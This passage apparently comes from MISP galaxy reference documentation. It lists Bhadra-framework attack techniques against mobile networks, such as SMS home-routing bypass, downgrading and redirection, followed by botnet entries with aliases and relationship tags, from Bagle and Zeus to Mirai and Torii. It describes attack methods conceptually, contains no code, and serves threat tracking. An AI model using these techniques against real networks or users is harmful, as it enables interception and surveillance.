Adversaries (e.g., evil operators) can for example exploit the implicit trust between roaming partners as a bypass firewall technique.

Bypass homerouting

SMS home routing is a defense mechanism, where an additional SMS router intervenes in external location queries for SMS deliveries, and the roaming network takes the responsibility of delivering the SMS without providing location information to the external entity. Although many operators have implemented SMS home routing solutions, there are no silver bullets. If the SMS routers are incorrectly configured, adversaries can hide SMS delivery location queries within other messages so that the SMS home router fails to process them. We refer to it as the bypass home routing technique.

Downgrading

Attacks on the radio access networks are well-studied and newer generations are designed to address the weaknesses in previous generations. Usage of weak cryptographic primitives, lack of integrity protection of the radio channels, and one-sided authentication (only from the network) remain as the problem of mostly GSM only radio communication. So, radio link attackers use downgrading as an attack technique to block service over newer generations and accept to serve only in the GSM radio network. The downgrading technique works similarly in the core network, where the adversary accepts to serve only in SS7-based signaling instead of Diameter-based signaling. Using interworking functions for inter-generation communication translation could make the downgrading attacks much easier.
Redirection

Redirection technique is a variant of the downgrading technique, where an adversary forcefully routes the traffic through networks or components that are under its control. By redirecting traffic to an unsafe network, the adversary can intercept mobile communication (e.g., calls and SMS) on the RAN part. Redirection attacks on the core network result in not only communication interception, but also in billing discrepancies, as an adversary can route the calls of a mobile user from its home network through a foreign network on a higher call rate.

The tag is: `misp-galaxy:bhadra-framework="Redirection"`

UE Protection evasion

Protection on the UE is mainly available in the form of antivirus apps as a defense against viruses and malware that steals sensitive information (e.g., banking credentials and user passwords) or track user activities. Simple visual cues on UE (such as notifications) could also be a protection mechanism by itself. Unfortunately, mobile network-based attacks cannot be detected or defended effectively from UE’s side by traditional antivirus apps, and such attacks do not trigger any visual signs. Although there are attempts for defending against radio link attacks, including citywide studies to detect IMSI catchers, their effectiveness is still under debate. Similarly, there are recent attempts to detect signaling attacks using distance bounding protocol run from a UE. However, such solutions are still in the research phase, and their effectiveness on a large scale is still untested. To this end, the absence of robust detection and defense mechanisms on the UE is, in fact, an evasion mechanism for an adversary. We refer to them as UE protection evasion techniques.

The tag is: `misp-galaxy:bhadra-framework="UE Protection evasion"`

Admin credentials

Stealing legitimate admin credentials for critical nodes is beneficial for the adversary to increase its chances of persistence to the target or masquerade its activities.

The tag is: `misp-galaxy:bhadra-framework="Admin credentials"`

User-specific identifiers

User-specific identifiers such as IMSI and IMEI are an indicator for who owns UE with a specific subscription and where a UE is located physically. Since mobile users always keep their mobile phones physically near them, an adversary with the knowledge of these permanent identifiers will be able to determine whether or not a user is in a specific location. On the other hand, temporary identifiers (e.g., TMSI and GUTI) are used to reduce the usage of permanent identifiers like IMSI over radio channels. Although the temporary identifiers are supposed to change frequently and expected to live for a short period, research has shown that it is not the case.

The tag is: `misp-galaxy:bhadra-framework="User-specific identifiers"`
User-specific data

Adversaries can collect several types of user-specific data, such as the content of SMS and calls, location dumps from base stations, call and billing records, and browsing-related data (such as DNS queries and unencrypted browsing sessions).

The tag is: misp-galaxy:bhadra-framework="User-specific data"

Network-specific identifiers

Adversaries aim to collect network-specific identifiers such as GTs and IPs of critical nodes and Tunnel Endpoint Identifier (TEID) of GTP tunnels from operators’ networks

The tag is: misp-galaxy:bhadra-framework="Network-specific identifiers"

Network-specific data

Adversaries may also be interested in network-specific data that are obtained mainly during the execution of discovery tactics. Such data includes, e.g., the network topology, the trust relationship between different nodes, routing metadata, and sensitive documents

The tag is: misp-galaxy:bhadra-framework="Network-specific data"

Location tracking

Attacker is able to track the location of the target end-user.

The tag is: misp-galaxy:bhadra-framework="Location tracking"

Calls eavesdropping

Attacker is able to eavesdrop on calls.

The tag is: misp-galaxy:bhadra-framework="Calls eavesdropping"

SMS interception

Attacker is able to intercept SMS messages.

The tag is: misp-galaxy:bhadra-framework="SMS interception"

Data interception

Attacker is able to intercept or modify internet traffic.

The tag is: misp-galaxy:bhadra-framework="Data interception"
Billing frauds

Billing frauds refer to various types of attacks where an adversary causes financial discrepancies for operators.

The tag is: `misp-galaxy:bhadra-framework="Billing frauds"`

DoS - network

The attacker can create signaling havoc in specific nodes of operators by repeatedly triggering resource allocation or revocation requests.

The tag is: `misp-galaxy:bhadra-framework="DoS - network"`

DoS - user

The attacker can cause denial of service to mobile users.

The tag is: `misp-galaxy:bhadra-framework="DoS - user"`

Identity-related attacks

Identity-based attacks involve attack techniques using user and network-specific identifiers. Identity-based attacks cause harm to the privacy of mobile users and produce fraudulent traffic that incurs a financial loss to operators. In most cases, identity-based attacks are used in impersonation, where an adversary impersonates a legitimate mobile user to the core network without possessing appropriate credentials, for example, to avail free mobile services. Most of the signaling attacks that use SS7 are also fall into this category. In other cases, identity-based attacks involve identity mapping, where the adversaries map temporary identifiers (e.g., TMSI and GUTI) to permanent identifiers (e.g., IMSI or MSISDN). In rare cases, the IMSI can further be mapped to social media identities.

The tag is: `misp-galaxy:bhadra-framework="Identity-related attacks"`

Botnet

Botnet is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Various
**ADB.miner**

A new botnet appeared over the weekend, and it’s targeting Android devices by scanning for open debug ports so it can infect victims with malware that mines the Monero cryptocurrency.

The botnet came to life on Saturday, February 3, and is targeting port 5555, which on devices running the Android OS is the port used by the operating system’s native Android Debug Bridge (ADB), a debugging interface that grants access to some of the operating system’s most sensitive features.

Only devices running the Android OS have been infected until now, such as smartphones, smart TVs, and TV top boxes, according to security researchers from Qihoo 360’s Network Security Research Lab [Netlab] division, the ones who discovered the botnet, which they named ADB.miner.

The tag is: *misp-galaxy:botnet=*ADB.miner*"*

*Table 498. Table References*

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**Bagle**

Bagle (also known as Beagle) was a mass-mailing computer worm affecting Microsoft Windows. The first strain, Bagle.A, did not propagate widely. A second variant, Bagle.B, was considerably more virulent.

The tag is: *misp-galaxy:botnet=*Bagle*"*

Bagle is also known as:

- Beagle
- Mitglieder
- Lodeight

Bagle has relationships with:

- similar: *misp-galaxy:malpedia=*Bagle* with estimative-language:likelihood-probability="likely"

*Table 499. Table References*

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<td><a href="https://en.wikipedia.org/wiki/Bagle_%28computer_worm%29">https://en.wikipedia.org/wiki/Bagle_%28computer_worm%29</a></td>
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**Marina Botnet**

Around the same time Bagle was sending spam messages all over the world, the Marina Botnet
quickly made a name for itself. With over 6 million bots pumping out spam emails every single day, it became apparent these “hacker tools” could get out of hand very quickly. At its peak, Marina Botnet delivered 92 billion spam emails per day.

The tag is: misp-galaxy:botnet="Marina Botnet"

Marina Botnet is also known as:

- Damon Briant
- BOB.dc
- Cotmonger
- Hacktool.Spammer
- Kraken

Marina Botnet has relationships with:

- similar: misp-galaxy:botnet="Kraken" with estimative-language:likelihood-probability="likely"

Table 500. Table References

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<td><a href="https://en.wikipedia.org/wiki/Botnet">https://en.wikipedia.org/wiki/Botnet</a></td>
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Torpig

Torpig, also known as Anserin or Sinowal is a type of botnet spread through systems compromised by the Mebroot rootkit by a variety of trojan horses for the purpose of collecting sensitive personal and corporate data such as bank account and credit card information. It targets computers that use Microsoft Windows, recruiting a network of zombies for the botnet. Torpig circumvents antivirus software through the use of rootkit technology and scans the infected system for credentials, accounts and passwords as well as potentially allowing attackers full access to the computer. It is also purportedly capable of modifying data hajimeon the computer, and can perform man-in-the-browser attacks.

The tag is: misp-galaxy:botnet="Torpig"

Torpig is also known as:

- Sinowal
- Anserin

Torpig has relationships with:

- similar: misp-galaxy:malpedia="Sinowal" with estimative-language:likelihood-probability="likely"

Table 501. Table References

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Storm

The Storm botnet or Storm worm botnet (also known as Dorf botnet and Ecard malware) is a remotely controlled network of “zombie” computers (or "botnet") that have been linked by the Storm Worm, a Trojan horse spread through e-mail spam. At its height in September 2007, the Storm botnet was running on anywhere from 1 million to 50 million computer systems, and accounted for 8% of all malware on Microsoft Windows computers. It was first identified around January 2007, having been distributed by email with subjects such as "230 dead as storm batters Europe," giving it its well-known name. The botnet began to decline in late 2007, and by mid-2008, had been reduced to infecting about 85,000 computers, far less than it had infected a year earlier.

The tag is: misp-galaxy:botnet="Storm"

Storm is also known as:

- Nuwar
- Peacomm
- Zhelatin
- Dorf
- Ecard

Table 502. Table References

Links

https://en.wikipedia.org/wiki/Storm_botnet

Rustock

The tag is: misp-galaxy:botnet="Rustock"

Rustock is also known as:

- RKRustok
- Costrat

Rustock has relationships with:

- similar: misp-galaxy:malpedia="Rustock" with estimative-language:likelihood-probability="likely"

Table 503. Table References

Links

https://en.wikipedia.org/wiki/Rustock_botnet
Donbot

The tag is: misp-galaxy:botnet="Donbot"

Donbot is also known as:

- Buzus
- Bachsoy

Donbot has relationships with:

- similar: misp-galaxy:malpedia="Buzus" with estimative-language:likelihood-probability="likely"

Table 504. Table References

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Cutwail

The Cutwail botnet, founded around 2007, is a botnet mostly involved in sending spam e-mails. The bot is typically installed on infected machines by a Trojan component called Pushdo. It affects computers running Microsoft Windows. related to: Wigon, Pushdo

The tag is: misp-galaxy:botnet="Cutwail"

Cutwail is also known as:

- Pandex
- Mutant

Cutwail has relationships with:

- similar: misp-galaxy:malpedia="Cutwail" with estimative-language:likelihood-probability="likely"

Table 505. Table References

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<td><a href="https://en.wikipedia.org/wiki/Cutwail_botnet">https://en.wikipedia.org/wiki/Cutwail_botnet</a></td>
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</table>

Akbot

Akbot was a computer virus that infected an estimated 1.3 million computers and added them to a botnet.

The tag is: misp-galaxy:botnet="Akbot"

Akbot has relationships with:
Srizbi

Srizbi BotNet, considered one of the world’s largest botnets, and responsible for sending out more than half of all the spam being sent by all the major botnets combined. The botnets consist of computers infected by the Srizbi trojan, which sent spam on command. Srizbi suffered a massive setback in November 2008 when hosting provider Janka Cartel was taken down; global spam volumes reduced up to 93% as a result of this action.

The tag is: *misp-galaxy:botnet=*"Srizbi"

Srizbi is also known as:

- Cbeplay
- Exchanger

Lethic

The Lethic Botnet (initially discovered around 2008) is a botnet consisting of an estimated 210 000 - 310 000 individual machines which are mainly involved in pharmaceutical and replica spam. At the peak of its existence the botnet was responsible for 8-10% of all the spam sent worldwide.

The tag is: *misp-galaxy:botnet=*"Lethic"

Lethic has relationships with:

- similar: *misp-galaxy:malpedia=*"Lethic" with estimative-language:likelihood-probability="likely"

Xarvester

The tag is: *misp-galaxy:botnet=*"Xarvester"

Xarvester is also known as:
Sality

Sality is the classification for a family of malicious software (malware), which infects files on Microsoft Windows systems. Sality was first discovered in 2003 and has advanced over the years to become a dynamic, enduring and full-featured form of malicious code. Systems infected with Sality may communicate over a peer-to-peer (P2P) network for the purpose of relaying spam, proxying of communications, exfiltrating sensitive data, compromising web servers and/or coordinating distributed computing tasks for the purpose of processing intensive tasks (e.g. password cracking). Since 2010, certain variants of Sality have also incorporated the use of rootkit functions as part of an ongoing evolution of the malware family. Because of its continued development and capabilities, Sality is considered to be one of the most complex and formidable forms of malware to date.

The tag is: `misp-galaxy:botnet="Sality"`

Sality is also known as:

• Sector
• Kuku
• Sality
• SalLoad
• Kookoo
• SaliCode
• Kukacka

Sality has relationships with:

• similar: `misp-galaxy:malpedia="Sality"` with `estimative-language:likelihood-probability="likely"`

Mariposa

The Mariposa botnet, discovered December 2008, is a botnet mainly involved in cyberscamming and denial-of-service attacks. Before the botnet itself was dismantled on 23 December 2009, it consisted of up to 12 million unique IP addresses or up to 1 million individual zombie computers.
infected with the "Butterfly (mariposa in Spanish) Bot", making it one of the largest known botnets.

The tag is: \textit{misp-galaxy:botnet="Mariposa"}

\textbf{Conficker}

Conficker, also known as Downup, Downadup and Kido, is a computer worm targeting the Microsoft Windows operating system that was first detected in November 2008. It uses flaws in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet, and has been unusually difficult to counter because of its combined use of many advanced malware techniques. The Conficker worm infected millions of computers including government, business and home computers in over 190 countries, making it the largest known computer worm infection since the 2003 Welchia.

The tag is: \textit{misp-galaxy:botnet="Conficker"}

Conficker is also known as:

- DownUp
- DownAndUp
- DownAdUp
- Kido

Conficker has relationships with:

- similar: \textit{misp-galaxy:malpedia="Conficker"} with \textit{estimative-language:likelihood-probability="likely"}

\textbf{Waledac}

Waledac, also known by its aliases Waled and Waledpak, was a botnet mostly involved in e-mail spam and malware. In March 2010 the botnet was taken down by Microsoft.

The tag is: \textit{misp-galaxy:botnet="Waledac"}

Waledac is also known as:

- Waled
Maazben

A new botnet, dubbed Maazben, has also been observed and is also growing rapidly. MessageLabs Intelligence has been tracking the growth of Maazben since its infancy in late May and early June. Its dominance in terms of the proportion of spam has been accelerating in the last 30 days from just over 0.5% of all spam, peaking at 4.5% of spam when it is most active. Currently spam from Maazben accounts for approximately 1.4% of all spam, but this is likely to increase significantly over time, particularly since both overall spam per minute sent and spam per bot per minute are increasing.

The tag is: *misp-galaxy:botnet="Maazben"*

Gheg

Tofsee, also known as Gheg, is another botnet analyzed by CERT Polska. Its main job is to send spam, but it is able to do other tasks as well. It is possible thanks to the modular design of this malware – it consists of the main binary (the one user downloads and infects with), which later downloads several additional modules from the C2 server – they modify code by overwriting some of the called functions with their own. An example of some actions these modules perform is spreading by posting click-bait messages on Facebook and VKontakte (Russian social network).

The tag is: *misp-galaxy:botnet="Gheg"*

Gheg is also known as:

- Tofsee
- Mondera
Gheg has relationships with:

- similar: misp-galaxy:malpedia="Tofsee" with estimative-language:likelihood-probability="likely"

**Table 5.16. Table References**

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**Nucrypt**

The tag is: misp-galaxy:botnet="Nucrypt"

**Table 5.17. Table References**

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**Wopla**

The tag is: misp-galaxy:botnet="Wopla"

**Table 5.18. Table References**

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<td><a href="https://www.botnets.fr/wiki.old/index.php/Wopla">https://www.botnets.fr/wiki.old/index.php/Wopla</a></td>
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**Asprox**

The Asprox botnet (discovered around 2008), also known by its aliases Badsrc and Aseljo, is a botnet mostly involved in phishing scams and performing SQL injections into websites in order to spread malware.

The tag is: misp-galaxy:botnet="Asprox"

Asprox is also known as:

- Badsrc
- Aseljo
- Danmec
- Hydraflux

Asprox has relationships with:

- similar: misp-galaxy:malpedia="Asprox" with estimative-language:likelihood-probability="likely"
Spamthru

Spam Thru represented an expontential jump in the level of sophistication and complexity of these botnets, harnessing a 70,000 strong peer to peer botnet seeded with the Spam Thru Trojan. Spam Thru is also known by the Aliases Backdoor.Win32.Agent.uu, Spam-DComServ and Troj.Agent.Bor. Spam Thru was unique because it had its own antivirus engine designed to remove any other malicious programs residing in the same infected host machine so that it can get unlimited access to the machine's processing power as well as bandwidth. It also had the potential to be 10 times more productive than most other botnets while evading detection because of in-built defences.

The tag is: `misp-galaxy:botnet="Spamthru"`

Spamthru is also known as:

- Spam-DComServ
- Covesmer
- Xmiler

Table 520. Table References

Links


Gumblar

Gumblar is a malicious JavaScript trojan horse file that redirects a user’s Google searches, and then installs rogue security software. Also known as Trojan/JSRedir-R this botnet first appeared in 2009.

The tag is: `misp-galaxy:botnet="Gumblar"`

Table 521. Table References

Links

https://en.wikipedia.org/wiki/Gumblar

BredoLab

The Bredolab botnet, also known by its alias Oficla, was a Russian botnet mostly involved in viral e-mail spam. Before the botnet was eventually dismantled in November 2010 through the seizure of its command and control servers, it was estimated to consist of millions of zombie computers.

The tag is: `misp-galaxy:botnet="BredoLab"`

BredoLab is also known as:
• Oficla

BredoLab has relationships with:

• similar: misp-galaxy:tool="Oficla" with estimative-language:likelihood-probability="likely"

Table 522. Table References

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## Grum

The Grum botnet, also known by its alias Tedroo and Reddyb, was a botnet mostly involved in sending pharmaceutical spam e-mails. Once the world’s largest botnet, Grum can be traced back to as early as 2008. At the time of its shutdown in July 2012, Grum was reportedly the world’s 3rd largest botnet, responsible for 18% of worldwide spam traffic.

The tag is: `misp-galaxy:botnet="Grum"`

Grum is also known as:

• Tedroo
• Reddyb

Table 523. Table References

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## Mega-D

The Mega-D, also known by its alias of Ozdok, is a botnet that at its peak was responsible for sending 32% of spam worldwide.

The tag is: `misp-galaxy:botnet="Mega-D"`

Mega-D is also known as:

• Ozdok

Table 524. Table References

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<tbody>
<tr>
<td><a href="https://en.wikipedia.org/wiki/Mega-D_botnet">https://en.wikipedia.org/wiki/Mega-D_botnet</a></td>
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</table>

## Kraken

The Kraken botnet was the world’s largest botnet as of April 2008. Researchers say that Kraken
infected machines in at least 50 of the Fortune 500 companies and grew to over 400,000 bots. It was estimated to send 9 billion spam messages per day. Kraken botnet malware may have been designed to evade anti-virus software, and employed techniques to stymie conventional anti-virus software.

The tag is: `misp-galaxy:botnet="Kraken"`

Kraken is also known as:

- Kraken

Kraken has relationships with:

- similar: `misp-galaxy:botnet="Marina Botnet"` with `estimative-language:likelihood-probability="likely"

**Festi**

The Festi botnet, also known by its alias of Spamnost, is a botnet mostly involved in email spam and denial of service attacks.

The tag is: `misp-galaxy:botnet="Festi"

Festi is also known as:

- Spamnost

**Vulcanbot**

Vulcanbot is the name of a botnet predominantly spread in Vietnam, apparently with political motives. It is thought to have begun in late 2009.

The tag is: `misp-galaxy:botnet="Vulcanbot"

**Table 525. Table References**

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LowSec

The tag is: misp-galaxy:botnet="LowSec"

LowSec is also known as:

- LowSecurity
- FreeMoney
- Ring0.Tools

TDL4

Alureon (also known as TDSS or TDL-4) is a trojan and bootkit created to steal data by intercepting a system’s network traffic and searching for: banking usernames and passwords, credit card data, PayPal information, social security numbers, and other sensitive user data. Following a series of customer complaints, Microsoft determined that Alureon caused a wave of BSoDs on some 32-bit Microsoft Windows systems. The update, MS10-015, triggered these crashes by breaking assumptions made by the malware author(s).

The tag is: misp-galaxy:botnet="TDL4"

TDL4 is also known as:

- TDSS
- Alureon

TDL4 has relationships with:

- similar: misp-galaxy:malpedia="Alureon" with estimative-language:likelihood-probability="likely"

Table 528. Table References

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<tbody>
<tr>
<td><a href="https://en.wikipedia.org/wiki/Alureon#TDL-4">https://en.wikipedia.org/wiki/Alureon#TDL-4</a></td>
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</table>

Zeus

Zeus, ZeuS, or Zbot is a Trojan horse malware package that runs on versions of Microsoft Windows. While it can be used to carry out many malicious and criminal tasks, it is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing. It is also used to install the CryptoLocker ransomware. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009 security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinessWeek. Similarly to Koobface, Zeus has also been used to trick victims of tech support scams into giving the scam artists money through pop-up messages that claim the user
has a virus, when in reality they might have no viruses at all. The scammers may use programs such as Command prompt or Event viewer to make the user believe that their computer is infected.

The tag is: `misp-galaxy:botnet="Zeus"`

**Zeus is also known as:**

- Zbot
- ZeuS
- PRG
- Wsnpoem
- Gorhax
- Kneber

**Zeus has relationships with:**

- similar: `misp-galaxy:tool="Zeus"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:banker="Zeus"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="Zeus"` with `estimative-language:likelihood-probability="likely"

**Table 529. Table References**

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**Kelihos**

The Kelihos botnet, also known as Hlux, is a botnet mainly involved in spamming and the theft of bitcoins.

The tag is: `misp-galaxy:botnet="Kelihos"`

**Kelihos is also known as:**

- Hlux

**Kelihos has relationships with:**

- similar: `misp-galaxy:malpedia="Kelihos"` with `estimative-language:likelihood-probability="likely"

**Table 530. Table References**

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Ramnit

Ramnit is a Computer worm affecting Windows users. It was estimated that it infected 800 000 Windows PCs between September and December 2011. The Ramnit botnet was dismantled by Europol and Symantec securities in 2015. In 2015, this infection was estimated at 3 200 000 PCs.

The tag is: misp-galaxy:botnet="Ramnit"

Ramnit has relationships with:

- similar: misp-galaxy:banker="Ramnit" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Ramnit" with estimative-language:likelihood-probability="likely"

Zer0n3t

The tag is: misp-galaxy:botnet="Zer0n3t"

Zer0n3t is also known as:

- Fib3rl0g1c
- Zer0n3t
- Zer0Log1x

Chameleon

The Chameleon botnet is a botnet that was discovered on February 28, 2013 by the security research firm, spider.io. It involved the infection of more than 120,000 computers and generated, on average, 6 million US dollars per month from advertising traffic. This traffic was generated on infected systems and looked to advertising parties as regular end users which browsed the Web, because of which it was seen as legitimate web traffic. The affected computers were all Windows PCs with the majority being private PCs (residential systems).

The tag is: misp-galaxy:botnet="Chameleon"

Table 531. Table References

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<td><a href="https://en.wikipedia.org/wiki/Botnet">https://en.wikipedia.org/wiki/Botnet</a></td>
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Table 532. Table References

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<tr>
<td><a href="https://en.wikipedia.org/wiki/Chameleon_botnet">https://en.wikipedia.org/wiki/Chameleon_botnet</a></td>
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</table>
Mirai

Mirai (Japanese for “the future”,Mirai) is a malware that turns networked devices running Linux into remotely controlled "bots" that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers. The Mirai botnet was first found in August 2016 by MalwareMustDie, a whitehat malware research group, and has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs’s web site, an attack on French web host OVH, and the October 2016 Dyn cyberattack.

The tag is: misp-galaxy:botnet="Mirai"

Mirai has relationships with:

- similar: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Mirai (ELF)" with estimative-language:likelihood-probability="likely"
- variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"
- variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

Table 533. Table References

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<tr>
<td><a href="https://en.wikipedia.org/wiki/Mirai_(malware)">https://en.wikipedia.org/wiki/Mirai_(malware)</a></td>
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XorDDoS

XOR DDOS is a Linux trojan used to perform large-scale DDoS

The tag is: misp-galaxy:botnet="XorDDoS"

Table 534. Table References

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<tr>
<td><a href="https://en.wikipedia.org/wiki/Xor_DDoS">https://en.wikipedia.org/wiki/Xor_DDoS</a></td>
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</table>

Satori

According to a report Li shared with Bleeping Computer today, the Mirai Satori variant is quite different from all previous pure Mirai variants. Previous Mirai versions infected IoT devices and
then downloaded a Telnet scanner component that attempted to find other victims and infect them with the Mirai bot. The Satori variant does not use a scanner but uses two embedded exploits that will try to connect to remote devices on ports 37215 and 52869. Effectively, this makes Satori an IoT worm, being able to spread by itself without the need for separate components.

The tag is: `misp-galaxy:botnet="Satori"`

Satori is also known as:

- Okiru

Satori has relationships with:

- similar: `misp-galaxy:tool="Satori"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Satori"` with `estimative-language:likelihood-probability="likely"

### Table 535. Table References

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### BetaBot

The tag is: `misp-galaxy:botnet="BetaBot"`

BetaBot has relationships with:

- similar: `misp-galaxy:malpedia="BetaBot"` with `estimative-language:likelihood-probability="likely"

### Hajime

Hajime (meaning ‘beginning’ in Japanese) is an IoT worm that was first mentioned on 16 October 2016 in a public report by RapidityNetworks. One month later we saw the first samples being uploaded from Spain to VT. This worm builds a huge P2P botnet (almost 300,000 devices at the time of publishing this blogpost), but its real purpose remains unknown. It is worth mentioning that in the past, the Hajime IoT botnet was never used for massive DDoS attacks, and its existence was a mystery for many researchers, as the botnet only gathered infected devices but almost never did anything with them (except scan for other vulnerable devices).

The tag is: `misp-galaxy:botnet="Hajime"`

Hajime has relationships with:

- similar: `misp-galaxy:malpedia="Hajime"` with `estimative-language:likelihood-probability="likely"`
**Muhstik**

The botnet is exploiting the CVE-2018-7600 vulnerability —also known as Drupalgeddon 2— to access a specific URL and gain the ability to execute commands on a server running the Drupal CMS. At the technical level, Netlab says Muhstik is built on top of Tsunami, a very old strain of malware that has been used for years to create botnets by infecting Linux servers and smart devices running Linux-based firmware. Crooks have used Tsunami initially for DDoS attacks, but its feature-set has greatly expanded after its source code leaked online. The Muhstik version of Tsunami, according to a Netlab report published today, can launch DDoS attacks, install the XMRig Monero miner, or install the CGMiner to mine Dash cryptocurrency on infected hosts. Muhstik operators are using these three payloads to make money via the infected hosts.

The tag is: *misp-galaxy:botnet="Muhstik"*

---

**Hide and Seek**

Security researchers have discovered the first IoT botnet malware strain that can survive device reboots and remain on infected devices after the initial compromise. This is a major game-changing moment in the realm of IoT and router malware. Until today, equipment owners could always remove IoT malware from their smart devices, modems, and routers by resetting the device. The reset operation flushed the device’s flash memory, where the device would keep all its working data, including IoT malware strains. But today, Bitdefender researchers announced they found an IoT malware strain that under certain circumstances copies itself to `/etc/init.d/`, a folder that houses daemon scripts on Linux-based operating systems —like the ones on routers and IoT devices. By placing itself in this menu, the device’s OS will automatically start the malware’s process after the next reboot.

The tag is: *misp-galaxy:botnet="Hide and Seek"*

Hide and Seek is also known as:

- HNS
- Hide ’N Seek
Hide and Seek has relationships with:

- similar: misp-galaxy:malpedia="Hide and Seek" with estimative-language:likelihood-probability="likely"

**Table 538. Table References**

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**Mettle**

Command-and-control panel and the scanner of this botnet is hosted on a server residing in Vietnam. Attackers have been utilizing an open-sourced Mettle attack module to implant malware on vulnerable routers.

The tag is: `misp-galaxy:botnet="Mettle"`

**Table 539. Table References**

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**Owari**

IoT botnet, Mirai variant that has added three exploits to its arsenal. After a successful exploit, this bot downloads its payload, Owari bot - another Mirai variant - or Omni bot. Author is called WICKED

The tag is: `misp-galaxy:botnet="Owari"`

Owari has relationships with:

- similar: misp-galaxy:malpedia="Owari" with estimative-language:likelihood-probability="likely"
- variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"
- variant-of: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"
- variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

**Table 540. Table References**

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<tr>
<td><a href="https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html">https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html</a></td>
</tr>
</tbody>
</table>
Brain Food

Brain Food is usually the second step in a chain of redirections, its PHP code is polymorphic and obfuscated with multiple layers of base64 encoding. Backdoor functionalities are also embedded in the code allowing remote execution of shell code on web servers which are configured to allow the PHP 'system' command.

The tag is: *misp-galaxy:botnet=“Brain Food”*

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**Table 541. Table References**

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Pontoeb

The bot gathers information from the infected system through WMI queries (SerialNumber, SystemDrive, operating system, processor architecture), which it then sends back to a remote attacker. It installs a backdoor giving an attacker the possibility to run command such as: download a file, update itself, visit a website and perform HTTP, SYN, UDP flooding.

The tag is: *misp-galaxy:botnet=“Pontoeb”*

Pontoeb is also known as:

- N0ise

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**Table 542. Table References**

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<tr>
<td><a href="http://dataprotectioncenter.com/general/are-you-beta-testing-malware/">http://dataprotectioncenter.com/general/are-you-beta-testing-malware/</a></td>
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Trik Spam Botnet

The tag is: *misp-galaxy:botnet=“Trik Spam Botnet”*

Trik Spam Botnet is also known as:

- Trik Trojan

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**Table 543. Table References**

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**Madmax**

The tag is: `misp-galaxy:botnet="Madmax"`

Madmax is also known as:

- Mad Max

Madmax has relationships with:

- similar: `misp-galaxy:tool="Mad Max"` with `estimative-language:likelihood-probability="likely"`

*Table 544. Table References*

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**Pushdo**

The tag is: `misp-galaxy:botnet="Pushdo"`

Pushdo has relationships with:

- similar: `misp-galaxy:malpedia="Pushdo"` with `estimative-language:likelihood-probability="likely"`

*Table 545. Table References*

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**Simda**

The tag is: `misp-galaxy:botnet="Simda"`

Simda has relationships with:

- similar: `misp-galaxy:malpedia="Simda"` with `estimative-language:likelihood-probability="likely"`

*Table 546. Table References*

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<td><a href="https://www.us-cert.gov/ncas/alerts/TA15-105A">https://www.us-cert.gov/ncas/alerts/TA15-105A</a></td>
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**Virut**

The tag is: `misp-galaxy:botnet="Virut"`
Virut has relationships with:

- similar: misp-galaxy:malpedia="Virut" with estimative-language:likelihood-probability="likely"

Table 547. Table References

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<td><a href="https://en.wikipedia.org/wiki/Virut">https://en.wikipedia.org/wiki/Virut</a></td>
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**Beebone**

The tag is: misp-galaxy:botnet="Beebone"

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**Bamital**

The tag is: misp-galaxy:botnet="Bamital"

Bamital is also known as:

- Mdrop-CSK
- Agent-OCF

Table 549. Table References

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**Gafgyt**

Linux.Gafgyt is a Trojan horse that opens a back door on the compromised computer and steals information. The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall's Global Management System (GMS).

The tag is: misp-galaxy:botnet="Gafgyt"

Gafgyt is also known as:

- Bashlite

Gafgyt has relationships with:
**Sora**

Big changes on the IoT malware scene. Security researchers have spotted a version of the Mirai IoT malware that can run on a vast range of architectures, and even on Android devices. This Mirai malware strain is called Sora, a strain that was first spotted at the start of the year. Initial versions were nothing out of the ordinary, and Sora’s original author soon moved on to developing the Mirai Owari version, shortly after Sora’s creation.

The tag is: `misp-galaxy:botnet="Sora"`

Sora is also known as:

- Mirai Sora

Sora has relationships with:

- variant-of: `misp-galaxy:botnet="Mirai"` with estimative-language:likelihood-probability="likely"
- variant-of: `misp-galaxy:tool="Mirai"` with estimative-language:likelihood-probability="likely"
- variant-of: `misp-galaxy:botnet="Owari"` with estimative-language:likelihood-probability="likely"

**Torii**

We have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses. The developers of the botnet seek wide coverage and for this purpose they created binaries for multiple CPU architectures, tailoring the malware for stealth and persistence.

The tag is: `misp-galaxy:botnet="Torii"`
Torii has relationships with:

- similar: misp-galaxy:malpedia="Torii" with estimative-language:likelihood-probability="likely"

Table 552. Table References

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<tr>
<td><a href="https://blog.avast.com/new-torii-botnet-threat-research">https://blog.avast.com/new-torii-botnet-threat-research</a></td>
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</table>

Persirai

A new Internet of Things (IoT) botnet called Persirai (Detected by Trend Micro as ELF_PERSIRAI.A) has been discovered targeting over 1,000 Internet Protocol (IP) Camera models based on various Original Equipment Manufacturer (OEM) products. This development comes on the heels of Mirai—an open-source backdoor malware that caused some of the most notable incidents of 2016 via Distributed Denial-of-Service (DDoS) attacks that compromised IoT devices such as Digital Video Recorders (DVRs) and CCTV cameras—as well as the Hajime botnet.

